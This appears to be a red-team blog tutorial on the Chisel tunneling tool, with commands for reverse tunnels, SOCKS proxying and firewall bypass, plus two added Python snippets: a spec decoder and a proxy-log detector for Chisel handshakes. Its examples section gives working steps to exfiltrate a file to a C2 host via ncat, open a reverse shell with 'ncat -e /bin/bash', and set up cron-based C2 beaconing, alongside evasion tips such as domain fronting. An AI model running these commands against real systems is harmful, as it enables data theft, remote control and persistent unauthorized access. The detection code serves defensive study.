Hey there, fellow hackers and pen testers! If you’re reading this article, you’re probably passionate about staying ahead in the game and mastering the tools that help us win big in cybersecurity. Today, I’ll be walking you through a powerful technique I’ve used in many red team engagements—tunneling traffic using Chisel, a lightweight tool that leverages HTTP to move SSH traffic across restricted networks.

Chisel is a fast, reliable, and versatile tool that can help us bypass firewalls, intrusion detection systems, and other security measures by tunneling our traffic over HTTP (an ordinary HTTP request that is upgraded to a WebSocket). It’s an invaluable resource when you’re on a red team engagement or just exploring the boundaries of a network.

In this article, we’ll explore the world of Chisel, its functionality, setup, and use cases. I’ll provide plenty of examples and code snippets along the way, and by the end of this article, you’ll be a Chisel expert, ready to tunnel your way to victory!

So, let’s dive in!

Understanding Chisel

Chisel is a powerful open-source tool for creating secure, encrypted tunnels between two systems. Developed by jpillora, Chisel is written in Go, making it easily portable across different platforms. At its core, Chisel is an SSH client and server that speaks HTTP: the client sends a plain HTTP request, upgrades it to a WebSocket, and runs an SSH session inside that connection, which lets it traverse firewalls and security devices typically configured to allow HTTP traffic.

One of Chisel’s greatest strengths is its versatility. It supports forward and reverse tunnels and SOCKS5 proxying and can be easily combined with other tools like Metasploit, Cobalt Strike, and even custom payloads.

Before we delve into the installation and setup process, it’s essential to understand the main components of Chisel:

  • Chisel Server: The server component listens for incoming client connections and sets up tunnels based on the client’s requests. The server can be hosted on any system with a public IP address or a domain, making it ideal for use with cloud infrastructure providers like AWS, GCP, or Azure.
  • Chisel Client: The client component connects to the Chisel server and requests specific tunnels to be set up. The client can be run on any system, including the target machine, your local machine, or a system within the target network.

With these components in mind, let’s install and set up Chisel.

Chisel Installation and Setup

To install Chisel, visit the GitHub repository (https://github.com/jpillora/chisel) and download the latest binary release for your operating system. Chisel is available for Linux, macOS, and Windows.

After downloading the binary, make it executable by running the following command:

chmod +x chisel

Now, you should be able to run the Chisel binary by simply executing:

./chisel

Chisel Use Cases

Let’s look at four common ways Chisel can help in real-world red team scenarios:

Bypassing Firewall Restrictions

One of the most common use cases for Chisel is bypassing firewall restrictions. This can be helpful when a target network has strict outbound rules that prevent you from establishing connections to your command and control (C2) infrastructure. You can bypass these restrictions and maintain control of compromised systems by tunneling traffic through an allowed protocol like HTTP.

To bypass firewall restrictions with Chisel, first, set up the Chisel server on a publicly accessible system. Run the following command on the server:

./chisel server -p 8080 --reverse

Next, run the Chisel client on the target machine. The client will connect to the Chisel server and request a reverse tunnel:

./chisel client http://<server-ip>:8080 R:2222:localhost:22

Now, you can SSH into the target machine through the Chisel server. Keep in mind that a reverse listener binds on all of the server’s interfaces by default, so anyone who can reach port 2222 on the server gets the same path to the target; this is one reason to run the server with --auth (see the tips below):

ssh -p 2222 user@<server-ip>

Remote Port Forwarding

To use Chisel for remote port forwarding (publishing a port of the target machine on the Chisel server), first start the Chisel server with reverse remotes enabled:

./chisel server -p 8080 --reverse

Next, on the target machine, run the Chisel client. The R: prefix makes the server listen on port 8081 and hand every connection to the client, which forwards it to its own port 80. Without the R: prefix (8081:localhost:80) the direction is the opposite: the client would listen on 8081 and the server would dial port 80, which is not what we want here.

./chisel client http://<server-ip>:8080 R:8081:localhost:80

Now, access the target’s HTTP service through the server:

curl http://<server-ip>:8081

Reverse Port Forwarding

To set up reverse port forwarding, run:

./chisel server -p 8080 --reverse

And on your local machine:

./chisel client http://<server-ip>:8080 R:8081:localhost:80

Any host that can reach the Chisel server, including systems on the target network, can now talk to your local HTTP service through the server’s port 8081. From the server itself:

curl http://localhost:8081
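To make the direction rules in the three sections above concrete, here is a small decoder, added for this article and not part of chisel, that turns a remote spec into a statement of which side listens and which side dials. It follows the remote grammar in the chisel README (local host defaults to 0.0.0.0, local port to the remote port, the socks remote to port 1080); IPv6 bracket hosts are not handled.

```python
"""Decode a Chisel remote spec into "who listens where, who dials where".
Added example, not chisel's own code. Grammar from the chisel README:
  [R:][local-host:]local-port:[remote-host:]remote-port  or  [R:][local-port:]socks
Without R: the CLIENT listens and the SERVER dials the remote side; with R:
the roles swap. local-host defaults to 0.0.0.0 (every interface), local-port
to remote-port, the socks listener to port 1080. IPv6 [bracket] hosts are not handled.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

@dataclass
class Remote:
    reverse: bool
    listen_host: str
    listen_port: int
    target_host: str
    target_port: Optional[int]  # None means a SOCKS remote (no fixed target)

    @property
    def listener(self) -> str:
        return "server" if self.reverse else "client"

    def describe(self) -> str:
        dialer = "client" if self.reverse else "server"
        target = "SOCKS5 egress" if self.target_port is None else f"{self.target_host}:{self.target_port}"
        exposed = " (all interfaces)" if self.listen_host == "0.0.0.0" else ""
        return f"{self.listener} listens on {self.listen_host}:{self.listen_port}{exposed}; {dialer} dials {target}"

def _listen_side(parts: List[str], default_port: int) -> Tuple[str, int]:
    """parts is [], [port] or [host, port]; the host falls back to 0.0.0.0."""
    if len(parts) == 2:
        return parts[0], int(parts[1])
    if len(parts) == 1:
        return "0.0.0.0", int(parts[0])
    return "0.0.0.0", default_port

def decode_remote(spec: str) -> Remote:
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks":                       # socks, R:socks, R:5000:socks
        host, port = _listen_side(parts[:-1], 1080)
        return Remote(reverse, host, port, "", None)
    target_port = int(parts.pop())                 # remote-port is mandatory
    target_host = "localhost"                      # default: the dialing side's own host
    if parts and not parts[-1].isdigit():          # an explicit remote-host was given
        target_host = parts.pop()
    host, port = _listen_side(parts, target_port)  # local-port defaults to remote-port
    return Remote(reverse, host, port, target_host, target_port)
```

Running decode_remote("R:2222:localhost:22").describe() reports that the server listens on 0.0.0.0:2222 and the client dials localhost:22, which is exactly why the listener deserves --auth.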

SOCKS Proxy

To use Chisel as a SOCKS5 proxy whose connections exit from the target network, start the server with reverse remotes enabled:

./chisel server -p 8080 --reverse

Then on the target machine, request a reverse socks remote. Note that --socks5 is a server-side flag, not a client option; the client asks for SOCKS with the socks remote:

./chisel client http://<server-ip>:8080 R:socks

The server now runs the SOCKS5 listener, on port 1080 by default (R:<port>:socks picks another port), and every proxied connection leaves through the client on the target machine. Confirm the port in the client’s output.

On your local machine, install and configure proxychains:

sudo apt-get install proxychains

Edit /etc/proxychains.conf and add:

socks5 <server-ip> <socks5-port>

Then:

proxychains curl http://internal-website.local

Real-World Examples

Exfiltrating Data from a Restricted Network

Start the Chisel server:

./chisel server -p 8080 --reverse

On the target:

./chisel client http://<c2-ip>:8080 R:4444:localhost:4444

Then:

cat sensitive-data.txt | ncat -l -p 4444

On your C2 server:

ncat -v <c2-ip> 4444 > exfiltrated-data.txt

Gaining Access to an Internal Web Application

Server:

./chisel server -p 8080 --reverse

Client (on a foothold inside the target network that can resolve and reach internal-webapp.local):

./chisel client http://<server-ip>:8080 R:8081:internal-webapp.local:80

Access the app:

curl http://<server-ip>:8081

Establishing a Chisel Beacon for Persistent C2 Communication

Server:

./chisel server -p 8080 --reverse

Client:

./chisel client http://<c2-ip>:8080 R:8888:localhost:8888 --keepalive 5m

Server listener:

ncat -l -p 8888

Target command execution:

ncat -e /bin/bash <c2-ip> 8888

Periodic Chisel Beacon with Cron

Server:

./chisel server -p 8080 --reverse

Client command (Chisel has no --timeout option and --reverse belongs to the server, so the 30-second cap comes from the coreutils timeout wrapper, and the remote has to be named explicitly; here it is the same one as in the beacon above):

timeout 30s ./chisel client http://<c2-ip>:8080 R:8888:localhost:8888

Crontab:

*/5 * * * * timeout 30s /path/to/chisel client http://<c2-ip>:8080 R:8888:localhost:8888 >/dev/null 2>&1

Optionally, also allow plain (non-reverse) socks remotes, which exit from the server itself rather than from the client:

./chisel server -p 8080 --reverse --socks5

Tips and Tricks for Advanced Chisel Usage

  • Combine Chisel with Metasploit, Cobalt Strike, or custom payloads.
  • Use domain fronting for stealth via CDNs like Cloudflare.
  • Add authentication with --auth user:pass on the server and pass the same --auth to the client, so nobody who stumbles on the listener can attach to your tunnels.
  • Use stunnel to wrap Chisel in TLS for added encryption, or use Chisel’s own TLS support (server --tls-key and --tls-cert, client connecting to an https:// URL), and pin the server’s key with the client’s --fingerprint option.
  • Watch for traffic patterns: avoid large data spikes or weird hours.
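From the defender’s side of that last tip, here is a small log scanner, added for this article and not the author’s or chisel’s code, that flags Chisel handshakes in HTTP proxy logs: the client opens a WebSocket upgrade whose Sec-WebSocket-Protocol header carries Chisel’s protocol version (chisel-v3 in current releases) and, unless --header or --hostname changes it, sends Go’s stock User-Agent. The JSON-lines format and the sample entries are constructed for the example; adapt the field names to whatever your proxy emits.

```python
"""Flag Chisel tunnel handshakes in HTTP proxy logs.
Added detection example, not part of the article or the chisel project.
Chisel's client performs a WebSocket upgrade and names its protocol version in
Sec-WebSocket-Protocol ("chisel-v3" in current releases); unless --header or
--hostname is used it also keeps Go's default "Go-http-client/1.1" User-Agent.
The one-JSON-object-per-line format below is a constructed stand-in.
"""
import json
from typing import Dict, List, Tuple

CHISEL_SUBPROTO_PREFIX = "chisel-v"
LONG_SESSION_S = 600   # an upgrade held open this long deserves a look on its own

def classify(entry: Dict) -> List[str]:
    """Return the reasons an entry looks like a Chisel tunnel (empty list = clean)."""
    hdr = {k.lower(): v for k, v in entry.get("headers", {}).items()}
    if hdr.get("upgrade", "").lower() != "websocket":
        return []                          # only WebSocket upgrades matter here
    reasons = []
    if hdr.get("sec-websocket-protocol", "").startswith(CHISEL_SUBPROTO_PREFIX):
        reasons.append("chisel subprotocol in handshake")
    if hdr.get("user-agent", "").startswith("Go-http-client/"):
        reasons.append("Go default User-Agent on a WebSocket upgrade")
    if entry.get("duration_s", 0) >= LONG_SESSION_S:
        reasons.append("long-lived WebSocket session")
    return reasons

def scan(log_lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Return (host, reasons) for every suspicious entry, in log order."""
    hits = []
    for line in log_lines:
        if not line.strip():
            continue
        entry = json.loads(line)
        reasons = classify(entry)
        if reasons:
            hits.append((entry["host"], reasons))
    return hits

# Constructed sample: a Chisel client handshake, a legitimate chat WebSocket, a plain GET.
SAMPLE_LOG = """\
{"method":"GET","host":"203.0.113.10:8080","path":"/","headers":{"Upgrade":"websocket","Connection":"Upgrade","Sec-WebSocket-Protocol":"chisel-v3","User-Agent":"Go-http-client/1.1"},"duration_s":3600}
{"method":"GET","host":"chat.example.com","path":"/ws","headers":{"Upgrade":"websocket","Connection":"Upgrade","User-Agent":"Mozilla/5.0"},"duration_s":120}
{"method":"GET","host":"www.example.com","path":"/index.html","headers":{"User-Agent":"curl/8.0"},"duration_s":0}
"""

if __name__ == "__main__":
    for host, reasons in scan(SAMPLE_LOG.splitlines()):
        print(host, "->", "; ".join(reasons))
```

The subprotocol match is the strong signal; the User-Agent and session-length checks are weak on their own and are there to catch a client that was started with a custom --header.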

Conclusion

Chisel is a stealthy, lightweight, and versatile tunneling tool perfect for red team operations. Its ability to bypass firewall restrictions, forward and reverse ports, and create SOCKS proxies makes it an invaluable asset for offensive security work.

In this article, we covered Chisel installation, practical use cases, real-world scenarios, and advanced usage tips. Now that you’ve got Chisel in your toolbox, try setting up a lab and practicing these techniques in a safe environment!

Remember—use this knowledge ethically and legally. Stay sharp, and happy hacking!